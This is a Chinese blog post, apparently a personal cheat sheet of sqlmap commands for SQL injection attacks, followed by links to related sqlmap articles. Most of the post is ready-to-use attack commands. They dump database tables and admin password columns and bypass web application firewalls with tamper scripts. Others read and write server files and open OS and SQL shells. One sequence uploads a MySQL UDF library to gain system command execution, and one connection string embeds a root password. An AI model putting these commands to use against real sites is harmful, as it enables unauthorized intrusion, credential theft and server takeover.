sqlmap运行mysql命令_sqlmap命令总结

最新推荐文章于 2024-01-28 17:33:38 发布
最新推荐文章于 2024-01-28 17:33:38 发布
阅读量470 收藏 3
点赞数
文章标签: sqlmap运行mysql命令
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32491317/article/details/113542629
版权

Sqlmap常规命令:

sqlmap -u "http://www.xxx.com/shownews.asp?id=1" –-tables (获取表)

sqlmap-u "http://www.xxx.com/shownews.asp?id=1" –-columns -T 表 (获取指定表字段内容)

sqlmap-u "http://www.xxx.com/shownews.asp?id=1" –-dump -C "admin,password" -T 表 (下载指定数据)

MYSQL(多个数据库):

sqlmap -u "http://www.xxx.com/shownews.php?id=1" –-dbs (获取数据库)

sqlmap-u "http://www.xxx.com/shownews.asp?id=1" –-current -db (获取当前网站数据库)

sqlmap-u "http://www.xxx.com/shownews.asp?id=1" –-tables -D "数据库"(获取指定数据库表)

sqlmap-u "http://www.xxx.com/shownews.asp?id=1" –-columns -T "表" -D "库"(获取指定字段内容)

sqlmap-u "http://www.xxx.com/shownews.asp?id=1" –-dump -C "admin,password" -T "表" -D "库"(下载指定数据)

Cookie注入:

sqlmap -u "http://www.xxx.com/shownews.asp?" –-cookie "id=1" –-level 2

POST注入:

包括两个方面,-r参数注入 – -data参数注入

两者区别根据具体情况选择

-r:用burp抓包保存为1.txt在sqlmap根目录,一般登陆框利用较多

sqlmap.py -r "1.txt"

--data:直接利用参数即可

sqlmap -u "http://www.xxx.com/shownews.asp?" –-data= "id=1"

伪静态注入:在存在注入的地方加上*,然后获取数据库

sqlmap.py -u "http://www.xx.com/index.php/index/view/id/40*.html" –-dbs

Sqlmap代理:

HTTP(S)代理:

参数:–proxy、–proxy-cred、–proxy-file和–ignore-proxy

使用参数"–proxy"来设置一个HTTP(S)代理,格式是"http(s)://url:port"。若代理需要认证,使用参数"–proxy-cred"来提供认证凭证,格式是"username:password"。

如:

sqlmap -u "http://www.xxx.com/shownews.asp?id=1" –-dbs –-proxy http://192.168.0.1:1080

–proxy-file:加载代理ip列表

如:

sqlmap.py -u"http://www.xxx.com/shownews.asp?id=1″ --proxy-file=dl.txt(代理ip文件)

–ignore-proxy:忽略本地代理设置

–proxy http://local:8080 –threads 10 (可以自定义线程加速) 代理

Tor代理模式:这个没试过,就不贴语法了。

Sqlmap的tamper过waf脚本整理:

sqlmap有着两个选项 --identify-waf 和 --check-waf  来辨认waf

注:自己常用的脚本

space2morehash.py space2hash.py(绕过过滤‘=’) base64encode.py(用base64编码替换)

charencode.py space2comment.py charunicodeencode.py(字符串unicode编码) chardoubleencode.py(双url编码)unmagicquotes.py(宽字符绕过 GPC addslashes) randomcomments.py(用/**/分割sql关键字) appendnullbyte.py(在有效负荷结束位置加载零字节字符编码)

Tamper语法:

batch:要求不对目标写入(碰到任何提示默认回车)

tamper:使用干预脚本

-v 3(3为等级)

注意:若不使用3等级无法继续下一步操作。

语法:sqlmap.py -u "http://www.xxx.com/shownews.asp?id=1" -v 3 --dbs --batch --tamper "space2morehash.py"

注意:mysql access等数据库的tamper脚本还是有所区别的

带上一个大佬整理的各个数据库对应的tamper脚本链接

https://blog.csdn.net/hxsstar/article/details/22782627

Sqlmap之请求延迟:

Sqlmap.py -u "http://www.xxx.com/shownews.asp?id=1" --tables --delay 0.5(延迟时间)

如果有网站dba权限,且可以读取写入文件,那么可以直接os-shell或者以下命令

– -file-read /home/www/index.php 读取指定文件

– -file-write 写入本地文件(- -file-write "c:\test\1.txt" – -file-dest "/home/www/feizhu.txt" 本地的1.txt文件写入到远程服务器feizhu.txt(此处需要有网站写入权限)

sqlmap连接数据库:

1.sqlmap连接mysql数据打开一个交互shell(远程数据库主机必须允外连才可以)

sqlmap.py -d mysql://root:lraewBxk548715@127.0.0.1:3306/test --sql-shell

select @@version;

select @@plugin_dir;

2.利用sqlmap上传lib_mysqludf_sys到MySQL插件目录(远程数据库主机必须允外连才可以)

sqlmap.py -d mysql://root:lraewBxk548715@127.0.0.1:3306/test --file-write=d:/tmp/lib_mysqludf_sys.dll --file-dest=d:\\wamp2.5\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\lib_mysqludf_sys.dll

CREATE FUNCTION sys_exec RETURNS STRING SONAME 'lib_mysqludf_sys.dll'

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.dll'

select sys_eval('ver');

sqlmap其他:

sqlmap.py -r 1.txt --dump -T orders -D www_data --start 2 --stop 4 -v 0 //导出www_data数据库中orders表第2条到第4条之间所有字段的数据

sqlmap.py -r 1.txt --sql-query "SELECT count(*) FROM www_data.orders" -v 1 //查询www_data数据库中orders表数据总数

勃恩泽
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap 连接mysql_sqlmap连接Mysql实现getshell(原创)
weixin_42509793的博客
01-19 2321
前言昨天群友发了一知乎的帖子..才发现sqlmap玩了那么久有些玩意我居然没玩过...然后看着群友玩= =今天也想试试。0x01首先得知道这个玩意,sqlmap -help,不说大家也懂搜嘎.语法为:" DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME" 或者是"DBMS://DATABASE_FILEPATH"。[1]dbms:代表所使用的...
黑客工具之sqlmap安装使用详解(非常详细)零基础入门到精通,收藏这一篇就够了_sqlmap sql server(2)
最新发布
m0_57472099的博客
05-10 743
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
sqlmap 连接mysql_sqlmap从入门到精通-第三章-4-4-使用sqlmap直连MSSQL获取webshell或权限...
weixin_39896839的博客
01-30 725
4.4 使用sqlmap直连MSSQL获取webshell或权限在某些情况下可能不存在SQL注入漏洞,但是通过发现目标源代码泄露,备份泄露,文件包含等方法获取了数据库服务器的IP地址,数据库账户和密码,而且含有对外可以访问的端口,或者可以通过代理的方式能够访问到端口,简单点理解就是可以通过公网直连MSSQL数据库,那么这个时候就可以根据具体情况获取webshell或系统权限4.4.1 MSSQL数...
sqlmap使用 mysql_sqlmap使用教程
weixin_39933713的博客
02-11 456
SQLMAP简介sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。1.支持的数据库:MySQL, Oracle,PostgreSQL, Microsoft SQL Server, M...
sqlmap运行mysql命令_Sqlmap常见命令
weixin_29193259的博客
01-21 600
Sqlmap常见命令借着复习mysql的机会再重新复习一下sqlmap,因为参数太多了,我只记录一下自己常用的命令,如果想看详细大全,可以看一下大佬们的完整版文章参考想了解sql注入流程的可以看一下1.选项-h,--help 显示基本帮助信息并退出-hh 显示高级帮助信息并退出--version 显示程序版本信息并退出2.目标在这些选项中必须提供至少有一个确定目标-u 目标URL例:sql...
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
2. 全面支持:SQLMap支持多种数据库系统,包括MySQL、PostgreSQL、Oracle、Microsoft SQL Server等。 3. 多种注入技术:它可以执行盲注、时间延迟注入、基于错误的注入等多种类型的SQL注入攻击。 4. 数据库接管:...
sqlmapproject-sqlmap-1.4.7-26-g84bc264 (1)_sqlmap_tool_
09-30
标题中的"sqlmapproject-sqlmap-1.4.7-26-g84bc264 (1)_sqlmap_tool_"表明我们讨论的是SQLMap的一个特定版本,即1.4.7-26-g84bc264。在本篇文章中,我们将深入探讨SQLMap的功能、工作原理以及如何使用这个强大的工具...
sqlmap_windows版
11-07
在Windows平台上,它通常需要Python环境来运行,但“sqlmap_windows版”提供了一个特别版本,使得用户可以在没有Python环境的情况下直接在Windows系统上执行SQLMap,极大地简化了使用流程。 1. **SQL注入攻击**:...
sqlmap-master
01-04
总结起来,SQLMap是一款强大的工具,它展示了SQL注入攻击的威力,同时也提醒我们在开发过程中必须重视SQL注入防护,确保应用的安全性。正确理解和使用SQLMap,对于网络安全专业人员和开发者来说,都是提升技能、保障...
SQLMAP Windows
02-23
4. **权限提升**:如果可能,SQLMAP会尝试获取数据库服务器的更高权限,例如通过执行系统命令或获取数据库用户凭据。 5. **数据库操作**:它允许用户执行自定义SQL查询,进行数据修改或删除操作。 6. **隐秘性**:...
sqlmap使用 mysql_sqlmap基本使用
weixin_35693055的博客
02-05 430
介绍:sqlmap是一个自动化的sql注入工具,其主要功能是扫描,发现并利用给定的URL进行sql注入,目前支持数据库有mysql、oracle、access、postagesql、sql server、sqlite等sqlmap采用了五种独特的sql注入技术:布尔类型的盲注,既可以根据返回页面判断条件真假的注入时间的盲注,既不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已经...
sqlmap -d mysql_sqlmap -d –os-shell 参数的使用
weixin_35540825的博客
01-21 1339
sqlmap是一款注入的神器,简介就不多说了。之前的文章也有相应的介绍,这一篇文章主要说一下-d以及–os-shell 参数的使用0×00–os-shell–os-shell也就是从注入点获得一个交互式的shell,可以执行一定的系统命令,当然要求注入点拥有文件的写权限,下面适量个针对 mssql 以及mysql的实例mssql:参数解释:–random-agent 随机使用user-agen...
sqlmap mysql 登录_sqlmap简单使用
weixin_42523104的博客
01-18 378
1. MySQL数据库注入检查注入点(主要看是否能返回消息):sqlmap.py -u url爆所有库:sqlmap.py -u url -dbs爆当前库:sqlmap.py -u url --current-db2.Access数据库注入判断是否是access数据库:url and exists(select id from MSysAccessObjects)其他数据库判断语句:Access:...
使用 sqlmap 探测 MySQL 容器
KipJ的博客
10-04 473
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. sqlmap是一个开源的渗透测试工具,它将检测和渗透脆弱数据库并接管数据...
sqlmap注入mysql_sqlmap注入系列(高级篇)
weixin_42107561的博客
01-30 939
前言:软件:burpsqlmap软件配置设置代理打开kali中自带的火狐浏览器 点击设置 --网络设置漏洞环境安装数字型注入(post)篇利用burp抓包,将包中的文件另存为33.txt爆出数据库sqlmap -r "/root/22.txt" --dbs爆出表sqlmap -r "22.txt" -D lou --tables爆出表结构sqlmap -r "22.txt" -D lou -T u...
mysql sqlmap_[转载]sqlmap实例注入mysql
weixin_33622032的博客
01-18 122
D:Python27sqlmap>sqlmap.py-u http://www.wepost.com.hk/article.php?id=276--dbms "Mysql"--current-user/*注解:获取当前用户名称sqlmap/0.9 - automatic SQL injection and database takeovertool[*] starting at: 16:5...
sqlmap进行mysql注入root权限读写文件
u013473439的专栏
01-14 5853
1.在BT5 R2下root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 -f -b --current-user --current-db -v 1 /*获取当前用户和当前数据库   返回结果 :   [02:42:20] [INFO] fetching current user cu
漏洞原理MySql注入 Windows中Sqlmap 工具的使用
qq_56248592的博客
01-28 811
漏洞利用:如果SQLmap检测到目标存在SQL注入漏洞,可以利用该漏洞执行各种操作,如获取数据库信息、执行系统命令、上传文件等。测试目标:使用SQLmap对目标进行测试,工具会检测是否存在SQL注入漏洞。6. 获取指定库指定表指定字段的值 # python sqlmap.py -u url -D 数据库名 -T 表名 -C 字段名1,字段名2... --dump。5. 获取当前数据库指定的表的字段名 # python sqlmap.py -u url -D 数据库名 -T 表名 --columns。
sqlmap盲注命令
09-08
下面是一些常用的sqlmap盲注命令: 1. sqlmap -u "http://www.vuln.cn/post.php?id=1" –dbms mysql –level 3 这个命令是用来检测给定URL是否存在SQL注入漏洞,并指定数据库类型为MySQL,设置检测级别为3。 2. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值